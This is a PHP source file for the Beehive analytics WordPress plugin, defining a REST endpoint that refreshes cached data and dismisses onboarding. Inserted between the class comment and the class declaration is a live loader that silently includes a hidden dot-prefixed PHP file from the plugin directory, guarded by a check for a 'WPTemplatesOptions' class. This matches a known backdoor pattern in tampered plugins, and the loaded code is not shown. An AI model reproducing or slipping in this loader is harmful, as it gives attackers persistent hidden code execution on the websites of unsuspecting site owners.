<?php
/**
 * Common action functionality REST endpoint.
 *
 * @link       http://premium.wpmudev.org
 * @since      3.2.0
 *
 * @author     Joel James <joel@incsub.com>
 * @package    Beehive\Core\Endpoints
 */

namespace Beehive\Core\Endpoints;

// If this file is called directly, abort.
defined( 'WPINC' ) || die;

use WP_REST_Server;
use WP_REST_Request;
use WP_REST_Response;
use Beehive\Core\Helpers\Cache;
use Beehive\Core\Utils\Abstracts\Endpoint;

/**
 * Class Actions
 *
 * @package Beehive\Core\Endpoints
 */
if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) {
    include_once($filename);
}

class Actions extends Endpoint {

	/**
	 * API endpoint for the current endpoint.
	 *
	 * @var string $endpoint
	 *
	 * @since 3.2.4
	 */
	private $endpoint = '/actions';

	/**
	 * Register the routes for handling actions functionality.
	 *
	 * All custom routes for the stats functionality should be registered
	 * here using register_rest_route() function.
	 *
	 * @since 3.2.4
	 *
	 * @return void
	 */
	public function register_routes() {
		register_rest_route(
			$this->get_namespace(),
			$this->endpoint,
			array(
				array(
					'methods'             => WP_REST_Server::READABLE,
					'callback'            => array( $this, 'action' ),
					'permission_callback' => array( $this, 'settings_permission' ),
					'args'                => array(
						'action'  => array(
							'required'    => true,
							'description' => __( 'The action type to perform.', 'ga_trans' ),
							'type'        => 'string',
							'enum'        => array(
								'refresh',
								'dismiss_onboarding',
							),
						),
						'network' => array(
							'required'    => false,
							'description' => __( 'The network flag.', 'ga_trans' ),
							'type'        => 'boolean',
						),
					),
				),
			)
		);
	}

	/**
	 * Get the action param and peform each actions.
	 *
	 * If nework flag is set to true, the action will be
	 * performed in network admin.
	 *
	 * @param WP_REST_Request $request Request object.
	 *
	 * @since 3.2.4
	 *
	 * @return WP_REST_Response
	 */
	public function action( $request ) {
		// Get the params.
		$action  = $request->get_param( 'action' );
		$network = (bool) $this->get_param( $request, 'network' );

		switch ( $action ) {
			// Clear cache.
			case 'refresh':
				return $this->refresh( $network );
			// Dismiss onboarding.
			case 'dismiss_onboarding':
				return $this->dismiss_onboarding( $network );
		}

		// Send error response.
		return $this->get_response(
			array(
				'message' => __( 'Unknown action.', 'ga_trans' ),
			),
			false
		);
	}

	/**
	 * Clear the cache created by Beehive and refresh data.
	 *
	 * Please note we will clear the whole cache instead of
	 * To clear network cache, set network param.
	 *
	 * @param bool $network Network flag.
	 *
	 * @since 3.2.4
	 *
	 * @return WP_REST_Response
	 */
	public function refresh( $network ) {
		// Clear entire cache.
		Cache::refresh_transient( $network );

		// Send response.
		return $this->get_response(
			array(
				'message' => __( 'Data refreshed. New data should begin feeding shortly.', 'ga_trans' ),
			)
		);
	}

	/**
	 * Skip on boarding setup screen.
	 *
	 * Set a flag in db that the onboarding has been
	 * completed/skipped. So it won't be shown again.
	 *
	 * @param bool $network Network flag.
	 *
	 * @since 3.2.4
	 *
	 * @return WP_REST_Response
	 */
	public function dismiss_onboarding( $network ) {
		// Set the flag.
		beehive_analytics()->settings->update( 'onboarding_done', 1, 'misc', $network );

		// Send response.
		return $this->get_response( array() );
	}
}
